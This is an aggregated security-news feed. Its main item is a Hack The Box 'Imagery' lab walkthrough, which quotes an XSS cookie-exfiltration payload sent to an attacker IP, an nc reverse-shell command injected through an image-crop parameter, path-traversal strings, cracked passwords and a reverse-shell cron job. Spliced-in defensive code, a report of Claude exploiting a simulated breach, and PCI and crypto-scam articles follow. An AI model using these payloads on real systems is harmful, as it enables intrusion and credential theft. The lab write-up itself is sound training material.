Security Boulevard
[Webinar] Doing More With Less: How Security Teams Escape Manual Work with Efficient Workflows
Security teams are under constant pressure to do more with the same resources. Manual processes, fragmented tools, and inefficient workflows can slow teams down and pull focus away from what matters most.
In this live webinar, experienced security practitioners share how they’ve escaped the constraints of limited
The post [Webinar] Doing More With Less: How Security Teams Escape Manual Work with Efficient Workflows appeared first on Security Boulevard.

DAST vs Penetration Testing: Key Differences in 2026
Learn about the key differences between DAST and pentesting, the emerging role of AI pentesting, their roles in security testing, and which is right for your business.
The post DAST vs Penetration Testing: Key Differences in 2026 appeared first on Security Boulevard.

Hack The Box: Imagery Machine Walkthrough – Medium Difficulty
Introduction to Imagery:
In this write-up, we will explore the “Imagery” machine from Hack The Box, categorised as a Medium difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
Objective:
The goal of this walkthrough is to complete the “Imagery” machine from Hack The Box by achieving the following objectives:
User Flag:
After gaining an initial foothold through weaknesses in the web application, access is gradually expanded beyond a standard user account. By leveraging exposed application data and mismanaged credentials, lateral movement becomes possible within the system. This progression ultimately leads to access to a regular system user account, where the user flag can be retrieved, marking the successful completion of the first objective.
Root Flag:
With user-level access established, further analysis reveals misconfigured privileges and trusted system utilities that can be abused. By carefully interacting with these elevated permissions and understanding how system-level automation is handled, full administrative control of the machine is achieved. This final escalation allows access to the root account and the retrieval of the root flag, completing the machine compromise.
Enumerating the Imagery Machine
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
nmap -sC -sV -oA initial 10.129.3.10
Nmap Output:
```
┌─[dark@parrot]─[~/Documents/htb/imagery]
└──╼ $nmap -sC -sV -oA initial 10.129.3.10
# Nmap 7.94SVN scan initiated Fri Jan 23 23:04:24 2026 as: nmap -sC -sV -oA initial 10.129.3.10
Nmap scan report for 10.129.3.10
Host is up (0.22s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 9.7p1 Ubuntu 7ubuntu4.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 35:94:fb:70:36:1a:26:3c:a8:3c:5a:5a:e4:fb:8c:18 (ECDSA)
|_  256 c2:52:7c:42:61:ce:97:9d:12:d5:01:1c:ba:68:0f:fa (ED25519)
8000/tcp open  http-alt Werkzeug/3.1.3 Python/3.12.7
|_http-title: Image Gallery
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 404 NOT FOUND
|     Server: Werkzeug/3.1.3 Python/3.12.7
|     Date: Sat, 24 Jan 2026 00:25:22 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 207
|     Connection: close
|     <!doctype html>
|     <html lang=en>
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest:
|     HTTP/1.1 200 OK
|     Server: Werkzeug/3.1.3 Python/3.12.7
|     Date: Sat, 24 Jan 2026 00:25:15 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 146960
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Image Gallery</title>
|     <script src="static/tailwind.js"></script>
|     <link rel="stylesheet" href="static/fonts.css">
|     <script src="static/purify.min.js"></script>
|     <style>
|     body {
|     font-family: 'Inter', sans-serif;
|     margin: 0;
|     padding: 0;
|     box-sizing: border-box;
|     display: flex;
|     flex-direction: column;
|     min-height: 100vh;
|     position: fixed;
|     top: 0;
|     width: 100%;
|     z-index: 50;
|_    #app-con
|_http-server-header: Werkzeug/3.1.3 Python/3.12.7
```
Analysis:
- Port 22 (SSH): SSH is available for remote access and may be used later if valid credentials are obtained.
- Port 8000 (HTTP): A Python-based web application is exposed on port 8000 and represents the primary attack surface for further enumeration.
Web Enumeration:
Web Application Exploration:

Features the app’s slogan “Capture & Cherish Every Moment” in large white text, followed by a description: “Your personal online gallery, designed for simplicity and beauty. Upload, organise, and relive your memories with ease.” Below that, a white section titled “Powerful Features at Your Fingertips” with three icons (a landscape image frame, a padlock for security, and a rocket for speed/performance). The navigation bar at the top includes “Home,” “Login,” and “Register.”
Application Overview

Centred white form on blue background titled “Register”. Fields: “Email ID” (placeholder: “Enter your email ID”) and “Password” (placeholder: “Enter your password” with eye icon for visibility). Blue “Register” button.

Fields pre-filled: “Email ID” as “dark@imagery.htb” and masked “Password”. Blue “Register” button.

Similar to register, titled “Login”. Fields pre-filled: “Email ID” as “dark@imagery.htb” and masked “Password”. Blue “Login” button, plus “Don’t have an account? Register here” link. Top nav: “Home”, “Login”, “Register”.

White background with title “Your Image Gallery”. A card message: “No images uploaded yet. Go to the ‘Upload’ page to add some!” Logged-in nav: “Home”, “Gallery”, “Upload”, “Logout” (red button).

Client-side JavaScript source code fetching and displaying admin bug reports from /admin/bug_reports with error handling and UI rendering logic.

JavaScript function handleDownloadUserLog redirects to /admin/get_system_log with a crafted log_identifier parameter based on username.

404 Not Found response when accessing the root /admin endpoint directly.

JSON access denied response (“Administrator privileges required”) when trying to access /admin/users as a non-admin user.

405 Method Not Allowed error on GET request to /report_bug, indicating the endpoint exists but requires a different HTTP method (likely POST).

App footer section showing copyright “© 2026 Imagery”, Quick Links (Home, Gallery, Upload, Report Bug), social media links, and contact info (support@imagery.com, fictional address).
Stored Cross-Site Scripting in Bug Reporting Feature on Imagery Machine

“Report a Bug” form pre-filled with “bugName”: “dark” and the same XSS cookie-stealing payload in Bug Details, ready for submission.

Terminal session as user “dark@parrot” running a local HTTP server (sudo python3 -m http.server 80) in the ~/Documents/htb/imagery directory to serve files/listen for requests on port 80.

Burp Suite capture of a successful POST to /report_bug, submitting JSON with "bugName": "dark" and XSS payload in "bugDetails" (<img src=x onerror="document.location='http://10.10.14.133:80/?cookie='+document.cookie">), response confirms submission with admin review message.

The response of successful POST to /report_bug, submitting an XSS payload in bugDetails to exfiltrate cookies via redirect to the attacker’s server.

Burp Suite capture of GET request to /auth_status returning JSON with logged-in user details (username “dark@imagery.htb”, isAdmin false).

Local Python HTTP server log showing incoming request from target (10.129.3.10) with stolen admin session cookie in query parameter, plus 404 for favicon.

Burp Suite capture of GET to /admin/ endpoint returning standard 404 Not Found HTML error page.

Successful GET to /admin/users with stolen admin cookie returning JSON user list (admin with isAdmin:true, testuser with isAdmin:false).

JavaScript source snippet of handleDownloadUserLog function redirecting to /admin/get_system_log with the encoded log_identifier parameter.
Local File Inclusion Leading to Credential Disclosure

Failed LFI attempt on non-existent path returning 500 Internal Server Error with “Error reading file: 404 Not Found”.

Successful LFI exploitation via /admin/get_system_log retrieving /etc/passwd contents through path traversal payload “../../../../../../etc/passwd”.

Admin Panel interface (accessed with hijacked session) showing User Management with admin and testuser entries, plus empty Submitted Bug Reports section.

LFI retrieval of /proc/self/environ exposes environment variables (LANG, PATH, WEBHOME, WEBSHELL, etc.).

Retrieved db.json file contents via /admin/get_system_log path traversal, exposing user records with MD5-hashed passwords for admin and testuser, alongside an empty bug_reports array.

LFI retrieval of config.py source code exposing app constants like DATA_STORE_PATH=’db.json’, upload folders, and allowed extensions.

CrackStation online tool cracking the MD5 hash “2c65c8d7bfbca32a3ed42596192384f6” to plaintext “iambatman”.

Terminal output of failed SSH attempt as testuser@10.129.3.10 with publickey authentication denied.
Authenticating to the Imagery Application Using TestUser’s Credentials

Login page with Email ID pre-filled as “testuser@imagery.htb” and masked password field.

Empty Gallery page for logged-in user stating “No images uploaded yet. Go to the ‘Upload’ page to add some!”

Upload New Image form with “lips.png” selected (max 1MB, allowed formats listed), optional title/description, group “My Images”, uploading as Account ID e5f6g7h8.
Achieving Shell Access via Remote Code Execution

Gallery view showing single uploaded image “lips” (red lips icon) with open context menu offering Edit Details, Convert Format, Transform Image, Delete Metadata, Download, and Delete.

Visual Image Transformation modal in crop mode with selectable box over the red lips image, parameters set to x:0 y:0 width:193 height:172.

Successful Burp POST to /apply_visual_transform with valid crop params returning new transformed image URL in /uploads/admin/transformed/.

Burp capture of POST to /apply_visual_transform with invalid crop “x”:”id” parameter resulting in 500 error (“invalid argument for option ‘-crop'”).

Burp capture of POST to /apply_visual_transform injecting “cat /etc/passwd” via crop “x” parameter, resulting in 500 error exposing command output snippet.
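The two server-side mistakes the captions describe, an unchecked path join behind /admin/get_system_log (the LFI section above) and crop values interpolated into an ImageMagick shell command (the three captions just above), have a short defensive counterpart. The following Python helpers are an added example, not the Imagery application's code and not from the walkthrough author; the /web/system_logs directory comes from the app listing later in the post, while the function names, the dimension bound and the argv shape are assumptions.

```python
"""
Defensive counterpart to two web flaws of the Imagery machine:
  1. a log-download parameter joined onto a directory without checking that the
     result stays inside it (path traversal to /etc/passwd, db.json, config.py);
  2. crop parameters pasted into a shell command line (an 'x' of 'id' produced an
     ImageMagick option error, and shell text in 'x' was executed).
Added example; names and bounds below are assumptions, not the app's own code.
"""
from pathlib import Path

LOG_ROOT = Path("/web/system_logs").resolve()   # assumed: the system_logs dir under /web
MAX_DIMENSION = 10_000                           # assumed upper bound for crop geometry


def safe_log_path(log_identifier: str) -> Path:
    """Map an untrusted identifier onto a file strictly inside LOG_ROOT.

    Resolving the joined path and then checking that it is still relative to
    LOG_ROOT rejects '../../../../etc/passwd' as well as absolute paths, which
    Path's '/' operator would otherwise let replace the base directory.
    """
    candidate = (LOG_ROOT / log_identifier).resolve()
    if not candidate.is_relative_to(LOG_ROOT):     # Python 3.9+
        raise ValueError("log identifier escapes the log directory")
    if candidate == LOG_ROOT:
        raise ValueError("log identifier names the directory, not a file")
    return candidate


def crop_geometry(params: dict) -> str:
    """Build an ImageMagick -crop geometry (WxH+X+Y) from strictly validated integers.

    Every value is coerced with int() and bounded, so there is no way for text
    (a command, an option name, a quote) to reach the geometry string.
    """
    values = {}
    for key in ("x", "y", "width", "height"):
        raw = params.get(key)
        if isinstance(raw, bool) or not isinstance(raw, (int, str)):
            raise ValueError(f"{key} must be an integer")
        try:
            value = int(raw)
        except ValueError:
            raise ValueError(f"{key} must be an integer") from None
        if value < 0 or value > MAX_DIMENSION:
            raise ValueError(f"{key} out of range")
        values[key] = value
    if values["width"] == 0 or values["height"] == 0:
        raise ValueError("width and height must be positive")
    return f"{values['width']}x{values['height']}+{values['x']}+{values['y']}"


def build_convert_argv(src: str, dst: str, params: dict) -> list:
    """Argument vector for subprocess.run(argv) with shell=False: no shell ever parses it."""
    return ["convert", src, "-crop", crop_geometry(params), dst]


if __name__ == "__main__":
    # Values taken from the walkthrough's crop request; "id" is the probe that errored.
    print(build_convert_argv("lips.png", "lips_cropped.png",
                             {"x": 0, "y": 0, "width": 193, "height": 172}))
    for bad in ("../../../../../../etc/passwd", "/etc/passwd"):
        try:
            safe_log_path(bad)
        except ValueError as exc:
            print(f"rejected {bad!r}: {exc}")
```

The second fix matters more than the first: even with perfect input validation, building a command with string formatting and `shell=True` leaves the shell as the parser of record, whereas an argument list makes the crop value one argv element no matter what it contains.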

Attacker terminal running netcat listener on port 9007 (nc -lvnp 9007).

Burp capture of POST to /apply_visual_transform with reverse shell payload in crop "x" parameter ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.133 9007 >/tmp/f").

Successful reverse shell connection from target (10.129.3.10) to attacker listener on port 9007, landing as web@Imagery.

Detailed directory listing of /web (app root) revealing source files (api_*.py, app.py, config.py, db.json, utils.py) and directories (bot, env, static, system_logs, templates, uploads).

Directory listing of /web/bot showing admin.py file owned by web user.

Source code of admin.py revealing Selenium automation bot with hardcoded admin credentials (“admin@imagery.htb”:“strongsandofbeach”), bypass token, and Chrome binary path.
Backup and Archive Discovery

Detailed directory listing of /var showing system directories (backup, backups, cache, crash, lib, local, log, mail, opt, run, snap, spool, tmp).

Directory listing of /var/backup showing an encrypted backup file web_20250806_120723.zip.aes.

Directory listing of /var/backups showing multiple compressed APT/dpkg state archives (.gz files).

Target starting Python HTTP server on port 9007 to serve the encrypted backup file.

Wget successfully downloading the encrypted backup file web_20250806_120723.zip.aes (22MB) from the target’s HTTP server on port 9007.

File command confirming web_20250806_120723.zip.aes is AES-encrypted data created by pyAesCrypt 6.1.1.

Attempt to run dpyAesCrypt.py failing with ModuleNotFoundError for ‘pyAesCrypt’ (case-sensitive import issue).

Successful pip3 user installation of pyaescrypt-6.1.1 package.

Failed execution of dpyAesCrypt.py due to ModuleNotFoundError for ‘termcolor’ (missing import dependency).

Successful pip3 user installation of termcolor-3.3.0 package.

Custom pyAesCrypt brute-forcer discovering password “bestfriends” early in the wordlist.

Successful decryption of the AES backup using “bestfriends”, outputting the original web_20250806_120723.zip.

unzip extracting the decrypted backup archive, revealing the full app source (api_*.py, app.py, config.py, db.json, utils.py), templates, system_logs, env, and compiled pycache files.



cat of decrypted db.json revealing user database with admin (hashed password), testuser (“iambatman”), and mark (another hashed password).

CrackStation results cracking MD5 hashes to “iambatman”, “supersmash”, and “spiderweb1234” (one unknown).

Successful su to mark using password “supersmash”, confirming uid/gid 1002.

Python one-liner (python3 -c 'import pty;pty.spawn("/bin/bash")') to spawn an interactive bash shell.

ls -al in /home/mark showing files including user.txt (likely containing the flag).

We can read the user flag with the “cat user.txt” command.
Escalate to Root Privileges Access to Imagery Machine
Privilege Escalation:

sudo -l reveals that user mark can run /usr/local/bin/charcol as root without a password (NOPASSWD).


charcol help output describing the CLI tool for encrypted backups, with commands (shell, help) and options (-quiet, -R for reset).

Failed charcol shell passphrase attempts (“bestfriend”, “supermash”, “supersmash”) resulting in lockout after multiple errors.

sudo charcol -R resetting application password to default (“no password” mode) after system password verification.

Repeated sudo charcol -R successfully resetting to no password mode.

charcol interactive shell entry after initial setup, displaying ASCII logo and info message.


charcol help output explaining backup/fetch commands and “auto add” for managing automated (root) cron jobs, with security warnings.

Attacker terminal running netcat listener on port 9007 in preparation for reverse shell.

Successful “auto add” command creating a root cron job with reverse shell payload to attacker (10.10.14.133:9007), verified with system password “supersmash”.


Successful privilege escalation to root via a malicious cron job that triggered a reverse shell, followed by reading the root flag from /root/root.txt.
The post Hack The Box: Imagery Machine Walkthrough – Medium Difficulty appeared first on Threatninja.net.
Shift Left QA for AI Systems. Catching Model Risk Before Production
Artificial intelligence (AI) systems rarely fail in obvious ways. No red error screen. No crashed service. No broken button. They fail quietly. Outputs look confident...
The post Shift Left QA for AI Systems. Catching Model Risk Before Production appeared first on ISHIR | Custom AI Software Development Dallas Fort-Worth Texas.
The post Shift Left QA for AI Systems. Catching Model Risk Before Production appeared first on Security Boulevard.
AIs are Getting Better at Finding and Exploiting Internet Vulnerabilities
Really interesting blog post from Anthropic:
In a recent evaluation of AI models’ cyber capabilities, current Claude models can now succeed at multistage attacks on networks with dozens of hosts using only standard, open-source tools, instead of the custom tools needed by previous generations. This illustrates how barriers to the use of AI in relatively autonomous cyber workflows are rapidly coming down, and highlights the importance of security fundamentals like promptly patching known vulnerabilities.
[…]
A notable development during the testing of Claude Sonnet 4.5 is that the model can now succeed on a minority of the networks without the custom cyber toolkit needed by previous generations. In particular, Sonnet 4.5 can now exfiltrate all of the (simulated) personal information in a high-fidelity simulation of the Equifax data breach—one of the costliest cyber attacks in history—using only a Bash shell on a widely-available Kali Linux host (standard, open-source tools for penetration testing; not a custom toolkit). Sonnet 4.5 accomplishes this by instantly recognizing a publicized CVE and writing code to exploit it without needing to look it up or iterate on it. Recalling that the original Equifax breach happened by exploiting a publicized CVE that had not yet been patched, the prospect of highly competent and fast AI agents leveraging this approach underscores the pressing need for security best practices like prompt updates and patches. ...
The post AIs are Getting Better at Finding and Exploiting Internet Vulnerabilities appeared first on Security Boulevard.
Hostnirvana Offers Lifetime Hosting for Three Websites for Just $20
This one-time purchase delivers SSD speed, security tools, and CDN-backed performance without monthly fees.
The post Hostnirvana Offers Lifetime Hosting for Three Websites for Just $20 appeared first on TechRepublic.
A $2.1 Million Portfolio Video Almost Ruined My Investing Plan
DLA turns to AI, ML to improve military supply forecasting
The Defense Logistics Agency — an organization responsible for supplying everything from spare parts to food and fuel — is turning to artificial intelligence and machine learning to fix a long-standing problem of predicting what the military needs on its shelves.
While demand planning accuracy currently hovers around 60%, DLA officials aim to push that baseline figure to 85% with the help of AI and ML tools. Improved forecasting will ensure the services have access to the right items exactly when they need them.
“We are about 60% accurate on what the services ask us to buy and what we actually have on the shelf. Part of that, then, is we are either overbuying in some capacity or we are under buying. That doesn’t help the readiness of our systems,” Maj. Gen. David Sanford, DLA director of logistics operations, said during the AFCEA NOVA Army IT Day event on Jan. 15.
Rather than relying mostly on historical purchase data, the models ingest a wide range of data that DLA has not previously used in forecasting. That includes supply consumption and maintenance data, operational data gleaned from wargames and exercises, as well as data that impacts storage locations, such as weather.
The models are tied to each weapon system and DLA evaluates and adjusts the models on a continuing basis as they learn.
“We are using AI and ML to ingest data that we have just never looked at before. That’s now feeding our planning models. We are building individual models, we are letting them learn, and then those will be our forecasting models as we go forward,” Sanford said.
Some early results already show measurable improvements. Forecasting accuracy for the Army’s Bradley Infantry Fighting Vehicle, for example, has improved by about 12% over the last four months, a senior DLA official told Federal News Network.
The agency has made the most progress working with the Army and the Air Force and is addressing “some final data-interoperability issues” with the Navy. Work with the Marine Corps is also underway.
“The Army has done a really nice job of ingesting a lot of their sustainment data into a platform called Army 360. We feed into that platform live data now, and then we are able to receive that live data. We are ingesting data now into our demand planning models not just for the Army. We’re on the path for the Navy, and then the Air Force is next. We got a little more work to do with Marines. We’re not as accurate as where we need to be, and so this is our path with each service to drive to that accuracy,” Sanford said.
Demand forecasting, however, varies widely across the services — the DLA official cautioned against directly comparing forecasting performance.
“When we compare services from a demand planning perspective, it’s not an apples-to-apples comparison. Each service has different products, policies and complexities that influence planning variables and outcomes. Broadly speaking, DLA is in partnership with each service to make improvements to readiness and forecasting,” the DLA official said.
The agency is also using AI and machine learning to improve how it measures true administrative and production lead times. By analyzing years of historical data, the tools can identify how industry has actually performed — rather than how long deliveries were expected to take — and factor that into DLA stock levels.
“When we put out requests, we need information back to us quickly. And then you got to hold us accountable to get information back to you too quickly. And then on the production lead times, they’re not as accurate as what they are. There’s something that’s advertised, but then there’s the reality of what we’re getting and is not meeting the target that that was initially contracted for,” Sanford said.
The post DLA turns to AI, ML to improve military supply forecasting first appeared on Federal News Network.

© Federal News Network
Ethereum’s Busy Network May Be Hiding A Security Problem: Analysts
Ethereum’s network has been buzzing. Blocks are full, wallets show new activity, and on-chain counters are ticking up fast. But not all of that motion looks like real people using the chain.
Address Poisoning On The Spotlight
In a recent blog post, researcher Andrey Sergeenkov warned that a recent Ethereum upgrade is being exploited to send tiny transactions that create misleading wallet history entries, a tactic known as address poisoning.
According to the expert, a big slice of the traffic may be the result of “dusting” or address poisoning attacks. Small, almost worthless transfers — sometimes less than a dollar — are being sent to a wide range of addresses.
Record-high Ethereum activity that everyone’s celebrating is an address poisoning attack.
– Over $740K already stolen, and growing – This became possible thanks to the Fusaka upgrade – This attack is ongoing right now https://t.co/cqoEvqttQd
— Andrey Sergeenkov (@Nikopolos) January 19, 2026
These tiny transfers create fake-looking entries in a wallet’s history. People who skim their recent transactions or copy addresses from a short list of past contacts can be tricked into sending funds to a scammer by mistake. It is a basic trick that gets more power when fees fall.
Why It Happened
Reports say that after recent updates and lower average gas costs, sending millions of tiny transactions became affordable. When fees drop, attackers can spray dust across large numbers of wallets and run follow-up scams at scale.
The tactic uses two steps: first, make a history entry that looks like a real counterparty; second, hope a user copies that wrong entry. Some attacks aim to deanonymize users, while others are pure bait to steal funds later.
An Ethereum wallet owner might glance at a list and use the wrong address. Or they might be prompted by a message that seems to match a past transfer. Either way, if funds are sent to the attacker, those funds are usually gone.
Reports estimate that hundreds of thousands of dollars have been siphoned from victims who fell for different versions of this trick. The sums are not always massive per case, but they add up when many victims are targeted.
Look for small incoming transfers from addresses you do not recognize, especially when those transfers appear in large batches. Watch for identical token amounts or for many transfers with the same memo or pattern.
Wallets that show sudden clusters of tiny token receipts are worth extra caution. Security tools and some wallets can hide tiny transfers or warn users about unusual incoming dust. Use those features if they are available.
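The two signals just described, clusters of tiny incoming transfers from unknown senders and senders whose address mimics a genuine counterparty, can be screened for mechanically. The Python below is an added example, not from the article or from Sergeenkov's research; the transfer records are a constructed, simplified shape (sender, USD value, memo, block number) rather than a real chain export, and the dust threshold, batch size and block window are assumptions.

```python
"""
Heuristic screen for address-poisoning dust in a wallet's incoming history.
Added example with constructed data; thresholds are assumptions, not values
from the article.
"""
from collections import Counter, defaultdict

DUST_USD = 1.00        # assumed: transfers worth under a dollar count as dust
CLUSTER_MIN = 3        # assumed: this many dust transfers in one block window is a batch
BLOCK_WINDOW = 5       # assumed: blocks either side that still count as the same batch
PREFIX, SUFFIX = 6, 4  # "0x" plus four hex chars at the front, four at the end


def looks_alike(candidate: str, known: str) -> bool:
    """True when candidate shows the same visible ends as known but is a different address."""
    c, k = candidate.lower(), known.lower()
    return c != k and c[:PREFIX] == k[:PREFIX] and c[-SUFFIX:] == k[-SUFFIX:]


def verify_destination(address: str, address_book: set) -> bool:
    """The advice in the article: accept a destination only on a full, exact match."""
    return address.lower() in {a.lower() for a in address_book}


def screen_incoming(transfers, address_book):
    """Return {sender: [reasons]} for unknown dust senders that fit a poisoning pattern."""
    dust = [t for t in transfers
            if t["usd"] < DUST_USD and not verify_destination(t["from"], address_book)]
    amounts = Counter(round(t["usd"], 6) for t in dust)
    memos = Counter(t["memo"] for t in dust if t["memo"])

    def in_batch(t):
        near = [u for u in dust if abs(u["block"] - t["block"]) <= BLOCK_WINDOW]
        return len(near) >= CLUSTER_MIN

    by_sender = defaultdict(list)
    for t in dust:
        by_sender[t["from"]].append(t)

    flagged = {}
    for sender, items in by_sender.items():
        reasons = []
        if any(in_batch(t) for t in items):
            reasons.append("arrived in a batch of dust transfers")
        if any(amounts[round(t["usd"], 6)] > 1 for t in items):
            reasons.append("identical amount seen in other dust transfers")
        if any(memos[t["memo"]] > 1 for t in items if t["memo"]):
            reasons.append("memo repeated across dust transfers")
        for known in address_book:
            if looks_alike(sender, known):
                reasons.append(f"address mimics {known[:PREFIX]}...{known[-SUFFIX:]}")
        if reasons:
            flagged[sender] = reasons
    return flagged


# Constructed sample: one genuine counterparty, one look-alike, two sprayers, one harmless tip.
REAL = "0xab12" + "1" * 32 + "ef56"      # address the user really dealt with
POISON = "0xab12" + "7" * 32 + "ef56"    # same first/last characters, different middle
SPRAY_A = "0x" + "d" * 40
SPRAY_B = "0x" + "e" * 40
TIP = "0x" + "f" * 40
ADDRESS_BOOK = {REAL}
SAMPLE_TRANSFERS = [
    {"from": REAL,    "usd": 250.0, "memo": "",        "block": 90},
    {"from": POISON,  "usd": 0.001, "memo": "",        "block": 100},
    {"from": SPRAY_A, "usd": 0.001, "memo": "airdrop", "block": 100},
    {"from": SPRAY_B, "usd": 0.001, "memo": "airdrop", "block": 101},
    {"from": TIP,     "usd": 0.5,   "memo": "",        "block": 50},
]

if __name__ == "__main__":
    for sender, reasons in screen_incoming(SAMPLE_TRANSFERS, ADDRESS_BOOK).items():
        print(sender[:PREFIX] + "..." + sender[-SUFFIX:], "->", "; ".join(reasons))
    print("safe to send to look-alike?", verify_destination(POISON, ADDRESS_BOOK))
```

The look-alike check is the important one: the sprayers only pollute the history, but the poison address is the entry a user copies by mistake because its visible ends match a real contact, which is exactly why the article's advice is to compare the whole address rather than its start and end.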
What Experts Advise
Based on reports, researchers urge people to verify the full address they are sending to, not just the start or end of it. Use address book features, QR codes, or trusted contacts to confirm destinations.
Avoid copying addresses from a short recent-history view. If you receive a small, unexpected deposit, take it as a warning sign, not an invitation.
Featured image from Pexels, chart from TradingView

You can publish apps from Manus without Xcode or Android Studio
Manus is adding app publishing that aims to turn a described app into an installable mobile build, handling packaging while you finish distribution in Google Play Console or App Store Connect and TestFlight.
The post You can publish apps from Manus without Xcode or Android Studio appeared first on Digital Trends.

PCI DSS Penetration Testing Requirements Explained
Last Updated on January 20, 2026 by Narendra Sahoo
What Is PCI Penetration Testing
PCI penetration testing is performed to identify security vulnerabilities in line with PCI DSS requirements.
PCI DSS 4.0.1 penetration testing requirements are targeted at:
- Internal systems that store, process, or transmit card data
- Public-facing devices and systems
- Databases
This is a controlled form of an ethical hacking exercise with the following objectives:
- Assess the access security and segmentation controls in line with PCI compliance requirements.
- Determine whether a threat actor could gain unauthorized access to CDE systems that store, process, or transmit payment data.
- To verify that the security environment and its solutions protect cardholder data (CHD) and sensitive authentication data (SAD) to the standard expected by the PCI compliance security assessment.
- To prevent PCI DSS non-compliance due to testing gaps.
Overview of PCI DSS 4.0.1
Overall, PCI DSS 4.0.1 is a set of 12 requirements distributed over six goals as a security standard for credit cards and debit cards. Not having proper documentation, poor protocols, or insufficient penetration testing may be among the reasons as to why PCI DSS audits fail.
What Penetration Testing Means for PCI DSS
| Aspect | Description |
|---|---|
| What it is | A controlled, authorized attack simulation against systems to identify exploitable security weaknesses |
| Purpose | To prove that security controls work in real-world conditions |
| PCI DSS reference | Requirement 11 (PCI DSS 4.0 and earlier versions) |
| Scope | Cardholder Data Environment (CDE) and connected systems |
| Outcome | Evidence of exploitable risk + remediation validation |
What PCI DSS requires
PCI DSS Requirement 11.3 penetration testing: Requirement 11.3 of PCI DSS explicitly mandates penetration testing at least once a year and after any significant change to your organization’s systems and tech stack.
Explanation of Key Terms (ASV and QSA)
A QSA is a qualified security assessor: the person who will approve all the things that you’re doing to say you’re passing the audit. An ASV is an external party that will do the vulnerability scan for your network that’s approved by the PCI Council.
Common industry practice: external penetration testing
Companies often look for a PCI DSS pentesting provider to meet their penetration testing objectives, which raises the question of internal versus external PCI penetration testing. Most organizations prefer to hire an external consultant to carry out their penetration testing; this is the standard procedure. Organizations wanting to reduce costs can consider doing the penetration test internally.
Carrying out penetration testing internally
Penetration testing carried out internally will later be judged by the PCI DSS auditing team. The audit scrutinizes your internal penetration testing efforts and documentation for sufficient expertise and for the absence of any conflict of interest.
Working with the auditor, such as the QSA, and informing them beforehand of your intent to carry out penetration testing internally supports your efforts to pass the PCI DSS audit.
Criteria #1: Sufficient Qualifications
You must have sufficient qualifications to carry out penetration testing internally. One needs to be a security professional or to have completed official penetration testing training; relevant work experience is another way to prove sufficiency. Again, planning to work with the QSA by informing them beforehand is key, and companies must know what evidence PCI auditors expect from penetration tests like these.
Criteria #2: No Conflict of Interest
The second criterion is the absence of a conflict of interest: there must be none between the people who built the in-scope systems and the penetration tester who tests them. Often a PCI auditor may grant a waiver. Being organizationally separate helps. In a small organization that lacks enough people to avoid the conflict, the QSA typically does grant a waiver.
Role of Penetration Testing in Achieving PCI DSS Goals
Organizations reach PCI DSS goals by different paths, and compliance requirements and their actual implementation may diverge at any point in time; penetration testing aims to uncover those gaps and help the organization converge on an implementation whose scope matches, or goes beyond, what compliance requires.
One can ideally think of penetration testing in a broader sense as an investigatory and study-based set of actions. In this manner, there are numerous benefits beyond merely identifying the areas where implementation of PCI DSS and compliance requirements differ.
When Penetration Testing Is Required Under PCI DSS
| Trigger Event | Penetration Testing Requirement |
|---|---|
| Annually | Mandatory penetration test at least once every 12 months |
| Significant system change | Required after major infrastructure, application, or network changes |
| New payment application | Required before production use |
| Network segmentation changes | Required to validate segmentation effectiveness |
| Cloud / hosting changes | Required if CDE exposure or trust boundaries change |
A penetration testing routine for any companies’ PCI DSS implementation eventually leads to a deeper and better understanding of their respective security posture, generates reports and documentation for posterity, and improves the organization’s ability and willingness to deal effectively with payment card security and data.
Insights from VISTA InfoSec – PCI DSS Compliance Fails Most Often Between Audit Cycles
One of the biggest misconceptions VISTA InfoSec always has to set straight with clients tackling PCI DSS is them treating it like a once-a-year event. PCI isn’t a point-in-time certification—it’s an ongoing operational requirement. What usually breaks compliance isn’t missing controls; it’s what happens after the audit. Quarterly ASV scans don’t get run; internal vulnerability assessments fall behind, and recurring reviews quietly stop. By the time the next assessment comes around, the controls exist—but the evidence doesn’t.
PCI DSS Penetration Testing Requirements
- Build and maintain a secure network and systems
- Protect cardholder data
- Maintain a vulnerability management program
- Implement strong access control measures
- Regularly monitor and test networks
- Maintain an information security policy
Insights from VISTA InfoSec – External ASV Scanning Is Frequently Misunderstood and Misapplied
VISTA InfoSec frequently encounters this issue across PCI DSS assessments: we have worked for clients who had their ASV scans being used for internal vulnerabilities. ASV scans are very specific in what they’re meant to do. They only apply to externally exposed IP addresses. What they are not is a replacement for internal vulnerability scanning. PCI DSS is very clear about separating external exposure testing from internal risk discovery, and assessors see this mistake all the time. If you’re using ASV scans to justify skipping internal assessments, that’s a compliance issue waiting to happen.
Hence, VISTA InfoSec recommends a practical rule: treat ASV scans and internal vulnerability assessments as complementary controls with distinct objectives, not as substitutes for one another.
Penetration Testing Context and Objectives
Penetration testing for PCI DSS follows the same format, and has the same aims, as penetration testing in any other context: it uncovers vulnerabilities and flaws in how a company's PCI DSS controls are implemented. Where a company relies on those controls to protect payment data, the test shows where they actually hold, and helps the organization maintain its security posture.
Insights from VISTA InfoSec – Segmentation Cannot Be Assumed, It Must Be Proven
At VISTA InfoSec, we observed a common misconception when working across multiple PCI DSS client environments, where segmentation is often treated as a design assertion rather than a control that must be continuously proven.
Segmentation as a security control, not a design feature: Segmentation is only valid under PCI DSS if you can prove it works. That means testing it. PCI DSS requires segmentation penetration testing at least annually (at least every six months for service providers) and after any change to segmentation controls, to demonstrate that traffic is limited exactly the way you say it is, between card and non-card environments and within internal CDE zones. Diagrams and documentation help, but they’re not enough. Assessors expect technical evidence that lateral movement is blocked in the real world.
